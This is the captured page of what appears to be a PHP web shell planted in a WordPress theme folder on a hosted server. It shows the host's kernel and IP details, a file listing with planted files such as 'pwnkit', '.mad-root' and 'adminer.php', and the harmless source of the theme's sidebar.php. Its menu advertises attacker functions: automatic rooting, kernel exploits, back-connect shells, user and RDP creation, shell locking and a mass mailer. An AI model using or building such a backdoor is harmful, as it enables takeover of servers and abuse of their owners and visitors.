Linux webd002.cluster130.gra.hosting.ovh.net 6.18.39-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Tue Jul 21 12:03:15 CEST 2026 x86_64
Apache
: 10.130.40.2 | : 216.73.217.172
Cant Read [ /etc/named.conf ]
8.3.31
espacpq
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
espacpq /
www /
wp-content /
themes /
agama-blue /
[ HOME SHELL ]
Name
Size
Permission
Action
assets
[ DIR ]
drwxr-xr-x
includes
[ DIR ]
drwxr-xr-x
languages
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
README.md
2.33
KB
-rw-r--r--
adminer.php
0
B
-rw-r--r--
functions.php
1.59
KB
-rw-r--r--
index.php
1009
B
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
screenshot.png
674.53
KB
-rw-r--r--
sidebar.php
1.14
KB
-rw-r--r--
style.css
3.34
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : sidebar.php
<?php /** * The sidebar containing the main widget area * * If no active widgets are in the sidebar, hide it completely. * * @package Theme-Vision * @subpackage Agama Blue * @since 1.0.1 */ // Do not allow direct access to the file. if( ! defined( 'ABSPATH' ) ) { exit; } ?> <?php /** * The Sidebar * * The sidebar containing the main widget area * * If no active widgets are in the sidebar, hide it completely. * * @author Theme Vision <support@theme-vision.com> * @package Agama * @since 1.0.0 */ // No direct access allowed. if( ! defined( 'ABSPATH' ) ) { exit; } $class[] = 'widget-area tv-col-md-3'; if ( 'right' == agama_sidebar_position() ) { $class[] = 'tv-order-2'; } else if ( 'left' == agama_sidebar_position() ) { $class[] = 'tv-order-1'; } ?> <?php if ( is_active_sidebar( 'sidebar-1' ) && ! is_home() ) : ?> <div id="secondary" class="<?php echo esc_attr( implode( ' ', $class ) ); ?>" role="complementary"><?php if ( ! function_exists( 'elementor_theme_do_location' ) || ! elementor_theme_do_location( 'main-sidebar' ) ) { dynamic_sidebar( 'sidebar-1' ); } ?> </div> <?php endif; ?>
Close